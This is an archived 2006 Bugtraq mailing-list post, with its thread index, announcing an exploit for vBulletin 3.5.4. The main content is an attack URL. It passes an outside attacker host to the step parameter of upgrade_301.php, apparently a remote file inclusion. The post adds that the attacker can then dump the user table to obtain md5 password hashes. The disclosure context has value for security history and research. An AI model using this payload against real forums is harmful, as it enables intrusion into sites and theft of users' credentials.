Bugtraq mailing list archives

vBulletin 3.5.4 (install_path) Exploit

From: CarcaBotx () yahoo com
Date: 5 Jul 2006 20:30:55 -0000

vBulletin 3.5.4 (install_path) Exploit
-
by: CarcaBot
-
application : vbulletin
-
URL : http://www.vbulletin.com
-
Exploit:

www.vicitimsite.com/forumpath/install/upgrade_301.php?step=http://CarcaBot.Ro
-
More Details:
Dump SQL DB named user then u have access at all md5 users passwords...

Current thread:

vBulletin 3.5.4 (install_path) Exploit CarcaBotx (Jul 05)
- <Possible follow-ups>
- Re: vBulletin 3.5.4 (install_path) Exploit mikathebest2003 (Jul 06)
- Re: vBulletin 3.5.4 (install_path) Exploit scott (Jul 06)
- Re: Re: vBulletin 3.5.4 (install_path) Exploit mikathebest2003 (Jul 10)
  - RE: Re: vBulletin 3.5.4 (install_path) Exploit Robert Marquardt (Jul 15)